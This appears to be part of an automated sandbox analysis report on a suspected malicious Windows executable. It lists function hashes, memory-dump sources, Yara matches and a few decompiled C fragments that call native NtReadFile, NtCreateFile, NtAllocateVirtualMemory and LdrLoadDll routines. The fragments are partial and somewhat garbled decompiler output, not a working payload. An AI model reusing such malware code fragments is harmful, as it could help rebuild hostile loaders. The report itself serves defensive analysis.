                          • API String ID:
                          • Opcode ID: efd6b0355094612a5374fde34f528c70086aa82b57825fcb6e6c2fd24e0b00c4
                          • Instruction ID: 8bc171303289b20f3e746f1ff74fb185d414a3012224302ed03f72b8debe106a
                          • Opcode Fuzzy Hash: efd6b0355094612a5374fde34f528c70086aa82b57825fcb6e6c2fd24e0b00c4
                          • Instruction Fuzzy Hash: 20F0F9B4D10208EFDB48DFA4E6057AEFBB1FB99301F1082AAD825A3344D7714A51CF40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 053865D7, Relevance: .0, Instructions: 32COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 396f6057a5cda3d1e4f2ce00dad76008e8d679618d421d7213d08ce28fb00e28
                          • Instruction ID: 54eeb6bbb187d63921d8e3eb68065b3a58a915d1647edb8df4aa85b1042479d4
                          • Opcode Fuzzy Hash: 396f6057a5cda3d1e4f2ce00dad76008e8d679618d421d7213d08ce28fb00e28
                          • Instruction Fuzzy Hash: 4401B274D10209EFCB44EFA8D585AAEBBF1FF49304F108AAAD814A7355D7709A90CF84
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05385498, Relevance: .0, Instructions: 32COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 454231c2d7bc90cf4a4609aa729f5815bd1eb78c81e23e287662bff2e24dd244
                          • Instruction ID: 05d55e0af8c5969008f5445f9acf10900b7c3fbc92cd6aef6ef9afb5c83942a6
                          • Opcode Fuzzy Hash: 454231c2d7bc90cf4a4609aa729f5815bd1eb78c81e23e287662bff2e24dd244
                          • Instruction Fuzzy Hash: 13E03972B001286F5314DAAAD884C6BBBEEEBCD664355853AF508C7310DA309C0086A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05386578, Relevance: .0, Instructions: 29COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 20a9dbd46560de71c79879391c9c5798df6274183e43267419b5709ae87446bf
                          • Instruction ID: 5596148aa746ae4af15868417150a7c37d0fe502a04a7d5259c7c50165ab8ecb
                          • Opcode Fuzzy Hash: 20a9dbd46560de71c79879391c9c5798df6274183e43267419b5709ae87446bf
                          • Instruction Fuzzy Hash: 1FF034F4C04209ABCB48EFF8D9012EEBFB4FB99301F009AAA8818A3244DB7046148B01
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05386520, Relevance: .0, Instructions: 28COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7fa04a18f2c3376ee1c7b7ad75bdeef35abb1f283e7a2d50a340cca7cc26e153
                          • Instruction ID: e28a79038845d8fe5b2aa897c0b585c5e5045ed155777236a3e83dc25c036b95
                          • Opcode Fuzzy Hash: 7fa04a18f2c3376ee1c7b7ad75bdeef35abb1f283e7a2d50a340cca7cc26e153
                          • Instruction Fuzzy Hash: 45F0DA74D04208EFCB48DFA5EA056AEFBB1FB89300F1085AAD824A3344D7705A51DF84
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0538E6E0, Relevance: .0, Instructions: 25COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 75cb40b96572535b40ff793deca78fb6f6232c6dc936cea6a3e6f2ef9d580941
                          • Instruction ID: 0bd460e6c695086cb4d4c1aab0f60fc819717360abf8b6c25e7d992abbb66aae
                          • Opcode Fuzzy Hash: 75cb40b96572535b40ff793deca78fb6f6232c6dc936cea6a3e6f2ef9d580941
                          • Instruction Fuzzy Hash: A9E08C327902103BE61E2155986BFBBB24EDBC1A61F50802AFA069E6C5CEE29D064291
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05384A4F, Relevance: .0, Instructions: 21COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9b97a700333f59954da634c1815c5acb5f45509dad7b09569967bf39a67893a1
                          • Instruction ID: 642f2f9c756ad674fdff4339e753daef01571e7f0a463eca86ff489bfe76c226
                          • Opcode Fuzzy Hash: 9b97a700333f59954da634c1815c5acb5f45509dad7b09569967bf39a67893a1
                          • Instruction Fuzzy Hash: CBE06D34A01108DBDB40EFA8EB42AEC77B5EB44209B218968C80997604DB311E1A9F41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05384A60, Relevance: .0, Instructions: 19COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1eeea81f3bc0184d8c2fd7f462bb19997382ab3dcd6554bbee23c7ba0d092053
                          • Instruction ID: 72c498cb64719e6f79357fbc254c5870b5b1fa70c622ccb8b7d22fc24d13dd8a
                          • Opcode Fuzzy Hash: 1eeea81f3bc0184d8c2fd7f462bb19997382ab3dcd6554bbee23c7ba0d092053
                          • Instruction Fuzzy Hash: 38E08634A1110CEFDB00FFA8EA019ADB7BEEB48218B208458D80A97704DB712F019F91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05389948, Relevance: .0, Instructions: 19COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 03b32592f52d5a0183e7e00a7f54eb2bdd4fc546382f5bc9dd7f234d8d03ceb3
                          • Instruction ID: afb9f16fb60b98285dedb5ab43c5e0f7b4c9b88c4440db3a19c414a578a783d1
                          • Opcode Fuzzy Hash: 03b32592f52d5a0183e7e00a7f54eb2bdd4fc546382f5bc9dd7f234d8d03ceb3
                          • Instruction Fuzzy Hash: C6E08C316041908FC700EAA8D844E863BB8DF89651B8440BEF409CB6A2DA619C02CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05380800, Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 65e057f6e40e83c1c8fea353a0602087da129f40d873aeb15e79973fbe673a26
                          • Instruction ID: 6f9be7fa7af99632128c9c6bd947a6e38ad5ae07a288df5b76b7e14e99ac278a
                          • Opcode Fuzzy Hash: 65e057f6e40e83c1c8fea353a0602087da129f40d873aeb15e79973fbe673a26
                          • Instruction Fuzzy Hash: 30D0C7926886C00BCB53E3B8292838A2F840F63028B0B48DE88888E00BE405804BCB5A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05389958, Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 910829a8149a87b39dc39b385492e38a5f5af1142a5fa3c7f7cb28f0c3030f3b
                          • Instruction ID: 5fa2441d111aab1f95f8231f95c2a199630e69764d2e7b26a2809b8be5b98c71
                          • Opcode Fuzzy Hash: 910829a8149a87b39dc39b385492e38a5f5af1142a5fa3c7f7cb28f0c3030f3b
                          • Instruction Fuzzy Hash: 79D0C9357101148FC704DB5DE44499537EDEF8D66579000BAF50ACB3A1DFA2AC428B80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05386BD8, Relevance: .0, Instructions: 9COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6b2876c624622a25da00fa8acb0328473a0e42fb058433e118dd92095decf0f7
                          • Instruction ID: 7146847500c4b2f27ce982a08826d92c267b8c9ffba8d6a65d11b2fa2343da0d
                          • Opcode Fuzzy Hash: 6b2876c624622a25da00fa8acb0328473a0e42fb058433e118dd92095decf0f7
                          • Instruction Fuzzy Hash: 80C04C39110108EBCB05AF96E90A95D7F6AFFDC661B14C121F84946220DF73A9529EA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05381A58, Relevance: .0, Instructions: 9COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 951920d98794170d821997f2c2fa74c86a181e54a558bc55c7edbf26e27d40fd
                          • Instruction ID: 6e1ee4c18c2431bb490364048e75ed23b362c2a2ec119542ccc01fbea60c5356
                          • Opcode Fuzzy Hash: 951920d98794170d821997f2c2fa74c86a181e54a558bc55c7edbf26e27d40fd
                          • Instruction Fuzzy Hash: DBC02BBB2182421FD7473F30CD07F503EA2EF52304F49C082E28044070C215C026CB13
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 008E5C24, Relevance: 1.4, Instructions: 1421COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.356188894.00000000008E2000.00000002.00020000.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.356179496.00000000008E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.356252577.0000000000950000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2cf9592eb73a24eeaabeaec9907e40b3a51264934340253c52e985053bea5980
                          • Instruction ID: 16bfcbb246e73f5c5df48e8d5d74350c2117560efe1f0b0ed106cffa9a68eaae
                          • Opcode Fuzzy Hash: 2cf9592eb73a24eeaabeaec9907e40b3a51264934340253c52e985053bea5980
                          • Instruction Fuzzy Hash: 42C2126180E7C14FDB138B789CB5295BFB1AE6721871E49CBC0C1CF0A3E1195A6BD762
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Analysis Process: cK1g5gckZR9VHjj.exe PID: 6104 Parent PID: 7160 cK1g5gckZR9VHjj.exeCOMMON

                          Executed Functions

                          Function 0041870C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45nativefileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 36%
                          			E0041870C(void* __eflags, long _a4, void* _a8, char _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				void* _v1;
				intOrPtr* __esi;
				void* __ebp;
				signed char _t11;
				void* _t15;
				void* _t16;
				intOrPtr* _t22;

				asm("outsd");
				asm("aaa");
				if(__eflags <= 0) {
					asm("les edx, [edx+edx*2]");
					_t6 =  &_a12; // 0x413d72
					_t15 =  *((intOrPtr*)( *_t22))( *_t6, _a16, _a20, _a24, _a28, _a32, _t16, _t11 & 0x00000083); // executed
					return _t15;
				} else {
					__ebp = __esp;
					__eax = _a4;
					_t8 = __eax + 0x10; // 0x300
					_t9 = __eax + 0xc50; // 0x409763
					__esi = _t9;
					E004191E0(__edi, _a4, __esi,  *_t8, 0, 0x2c) =  *__esi;
					__eax = NtClose(_a8); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}










                          0x0041870c
                          0x0041870d
                          0x0041870e
                          0x004186b6
                          0x004186cd
                          0x004186d5
                          0x004186d9
                          0x00418710
                          0x00418711
                          0x00418713
                          0x00418716
                          0x0041871f
                          0x0041871f
                          0x0041872f
                          0x00418735
                          0x00418737
                          0x00418738
                          0x00418739
                          0x00418739

                          APIs
                          • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                          • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: CloseFileRead
                          • String ID: r=A$r=A
                          • API String ID: 752142053-687523353
                          • Opcode ID: 3b3bec6fc17b14757e2846f337452442af0f872d1e81a83bb53dd8ee4f6c1341
                          • Instruction ID: c55b9a0ab9c92f634dcec03df039051860dc37adbd83c16fa249bc5599e4b9db
                          • Opcode Fuzzy Hash: 3b3bec6fc17b14757e2846f337452442af0f872d1e81a83bb53dd8ee4f6c1341
                          • Instruction Fuzzy Hash: F3F037B6204109ABDB14EF98DC84EEB77ADEF8C350F148659FA1C97201C630EA518BA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00418690, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 25%
                          			E00418690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, signed char _a36, void* _a40) {
				void* _v5;
				signed char _t15;
				void* _t19;
				intOrPtr _t21;
				void* _t28;
				intOrPtr* _t29;

				_t13 = _a4;
				_t29 = _a4 + 0xc48;
				E004191E0(_t28, _a4, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t15 = _a36;
				_t6 =  &_a32; // 0x413d72
				_t21 =  *_t6;
				asm("les edx, [edx+edx*2]");
				_t12 =  &_a8; // 0x413d72
				_t19 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28, _t21, _t15 & 0x00000083); // executed
				return _t19;
			}









                          0x00418693
                          0x0041869f
                          0x004186a7
                          0x004186af
                          0x004186b2
                          0x004186b2
                          0x004186b6
                          0x004186cd
                          0x004186d5
                          0x004186d9

                          APIs
                          • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: FileRead
                          • String ID: 1:A$r=A$r=A
                          • API String ID: 2738559852-4243674446
                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                          • Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                          • Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00409B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                          • Instruction ID: 0a0fff248a1c50f77d94468520b7725d30d267451342bd90074e2a3d68e37629
                          • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                          • Instruction Fuzzy Hash: B50152B5D0010DB7DF10DAE1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004185E0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                          • Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                          • Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004185DA, Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 14fb0e685b14bc2e8987bb15aad2236e8004caa7c4de4aa380136097aeacb9b2
                          • Instruction ID: 8bdd5aeda29f47ac0509a0170fa52686f44c6279ab4504c2a3c2d20870324ebe
                          • Opcode Fuzzy Hash: 14fb0e685b14bc2e8987bb15aad2236e8004caa7c4de4aa380136097aeacb9b2
                          • Instruction Fuzzy Hash: 67F014B6204189ABCB08CF98D885CEB77A9EF8C354B15864DFA0D93202C634E851CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004187C0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: AllocateMemoryVirtual
                          • String ID:
                          • API String ID: 2167126740-0
                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                          • Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                          • Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004187BA, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: AllocateMemoryVirtual
                          • String ID:
                          • API String ID: 2167126740-0
                          • Opcode ID: f0df123638db383ec16eab7ed2f3c65fc3d6a2ffb79afe6041dca1b672234c46
                          • Instruction ID: aeb5714664a6f4c1001d9c77c1b6d016b203ec6e3297d5e22e6097ef29b6eef1
                          • Opcode Fuzzy Hash: f0df123638db383ec16eab7ed2f3c65fc3d6a2ffb79afe6041dca1b672234c46
                          • Instruction Fuzzy Hash: CBF0F2B6204209ABDB14DF89DC85EEB77A9AF88354F118659FE0897241C634E910CBE0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00418710, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                          • Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                          • Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01029910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 317d125c7d5e073beec560ed4070320961ffde74fadaa5693a3c53cc47ba2b36
                          • Instruction ID: 878fbbdb5b448471a8d4aa652203e5919befb66cfd9d585cb76835cf29415190
                          • Opcode Fuzzy Hash: 317d125c7d5e073beec560ed4070320961ffde74fadaa5693a3c53cc47ba2b36
                          • Instruction Fuzzy Hash: 149002B122100902D140719984047460109A7D0342F91C011A5454554EC6998DE577A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010299A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: f7e5f687201b5ace756eccdb263e20140ad6c8dacb124c2aa7a42cf16ff8f425
                          • Instruction ID: aa4a37bed587550ef9467aec38bc1f07e25c5d06725e9b8f31570c41a0df4203
                          • Opcode Fuzzy Hash: f7e5f687201b5ace756eccdb263e20140ad6c8dacb124c2aa7a42cf16ff8f425
                          • Instruction Fuzzy Hash: 589002A136100942D10061998414B060109E7E1342F91C015E1454554DC659CC627266
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01029840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 4755b0bceb46d608b5f53a08c4899b407e3f54b1748b0771236c1861cd280057
                          • Instruction ID: 27e7f997586d380aa8351c15ef4d1ddb306e1541e4ff8f0d5d20cbba9319dea0
                          • Opcode Fuzzy Hash: 4755b0bceb46d608b5f53a08c4899b407e3f54b1748b0771236c1861cd280057
                          • Instruction Fuzzy Hash: 31900261262046525545B1998404507410AB7E02827D1C012A1804950CC5669866E761
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01029860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: de68b20f7e31871f23ef988875caefaadbd10bfa21f2507df5d64babeb468be6
                          • Instruction ID: 0269b32bcb8943da6e62541dce365fa93da17aec66b3f0b31f23f751275f1b2d
                          • Opcode Fuzzy Hash: de68b20f7e31871f23ef988875caefaadbd10bfa21f2507df5d64babeb468be6
                          • Instruction Fuzzy Hash: B790027122100913D11161998504707010DA7D0282FD1C412A0814558DD6968962B261
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010298F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 2c4523b252a9ac091e74fb3b69affed48e8084ad022a31be4e54fa06c7f0ee70
                          • Instruction ID: bfa8fdb8e4f1e9375ae6f7c4cbd55992d2bbeb87acf3a0cd7365e287bc2878b8
                          • Opcode Fuzzy Hash: 2c4523b252a9ac091e74fb3b69affed48e8084ad022a31be4e54fa06c7f0ee70
                          • Instruction Fuzzy Hash: 9990026162100A02D10171998404616010EA7D0282FD1C022A1414555ECA6589A2B271
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01029A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 2c8f6f2e489f447864e8105562a70cdc45d4a75fe5d1bc878e61345ead3dce5d
                          • Instruction ID: e9332fc8bb0adc80e2e26c0e1dbefcd5aeae9eec41da453da6b6b496f8d7e4b1
                          • Opcode Fuzzy Hash: 2c8f6f2e489f447864e8105562a70cdc45d4a75fe5d1bc878e61345ead3dce5d
                          • Instruction Fuzzy Hash: CD90027122140902D1006199881470B0109A7D0343F91C011A1554555DC665886176B1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01029A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 67e5794ca0255eba8db9a95215e934dbd880bff82c748653c0e43c5bfbb6d582
                          • Instruction ID: 143a7bf3bb937a0808796b936fbf7c5c97e898ea99567b1e7e93baefa4b60ead
                          • Opcode Fuzzy Hash: 67e5794ca0255eba8db9a95215e934dbd880bff82c748653c0e43c5bfbb6d582
                          • Instruction Fuzzy Hash: 2F90026162100542414071A9C8449064109BBE1252791C121A0D88550DC599887567A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01029A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 24862cce38b614e33b80570cde9fa9861dc58fb5c18a70412d6af50b3b4c3219
                          • Instruction ID: 3dd63de568deed24a6abd2691d5003fcd145389bfa706a0b607752b1d4141ecd
                          • Opcode Fuzzy Hash: 24862cce38b614e33b80570cde9fa9861dc58fb5c18a70412d6af50b3b4c3219
                          • Instruction Fuzzy Hash: 1890026123180542D20065A98C14B070109A7D0343F91C115A0544554CC95588716661
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01029540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 12a2c8ce63aacd23e0c15516b92cc477ab619280a2311fc3c306d916a296e95e
                          • Instruction ID: 835c2fd37c23f9b669f8d3973f5407af7e619d74afedc05e34640e8e4359f62c
                          • Opcode Fuzzy Hash: 12a2c8ce63aacd23e0c15516b92cc477ab619280a2311fc3c306d916a296e95e
                          • Instruction Fuzzy Hash: 27900265231005030105A5994704507014AA7D5392391C021F1405550CD66188716261
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010295D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
